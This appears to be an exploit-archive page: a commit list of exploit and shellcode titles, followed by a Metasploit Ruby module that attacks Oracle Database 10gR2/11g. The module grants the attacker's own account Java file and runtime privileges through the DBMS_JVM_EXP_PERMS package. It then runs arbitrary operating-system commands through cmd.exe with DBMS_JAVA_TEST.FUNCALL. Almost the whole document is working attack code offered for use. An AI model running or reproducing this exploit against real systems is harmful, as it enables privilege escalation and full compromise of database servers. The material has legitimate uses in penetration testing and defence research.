880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
74 lines
No EOL
3.2 KiB
Ruby
Executable file
74 lines
No EOL
3.2 KiB
Ruby
Executable file
source: https://www.securityfocus.com/bid/38115/info
|
|
|
|
Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages.
|
|
|
|
The attacker can exploit these issues to escalate their privileges to DBA or execute arbitrary operating system commands with SYSTEM privileges, leading to a complete compromise of an affected computer.
|
|
|
|
These vulnerabilities affect Oracle Database 11gR2. One of the issues also affects Oracle Database 10gR2.
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/projects/Framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::ORACLE
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution',
|
|
'Description' => %q{
|
|
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
|
|
any user with create session privilege to grant themselves java IO privileges.
|
|
Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)
|
|
|
|
},
|
|
'Author' => [ 'sid[at]notsosecure.com' ],
|
|
'License' => MSF_LICENSE,
|
|
'Version' => '$Revision: 8822 $',
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ],
|
|
[ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ],
|
|
],
|
|
'DisclosureDate' => 'Feb 1 2010'))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
|
|
], self.class)
|
|
end
|
|
|
|
def run
|
|
name = Rex::Text.rand_text_alpha(rand(10) + 1)
|
|
|
|
|
|
package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
|
|
|
|
package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
|
|
|
|
|
|
package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
|
|
|
|
|
|
|
|
os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual"
|
|
|
|
begin
|
|
print_status("Attempting to grant JAVA IO Privileges")
|
|
prepare_exec(package1)
|
|
prepare_exec(package2)
|
|
prepare_exec(package3)
|
|
print_status("Attempting to execute OS Code")
|
|
prepare_exec(os_code)
|
|
rescue => e
|
|
print_status("Error: #{e.class} #{e}")
|
|
end
|
|
end
|
|
|
|
end |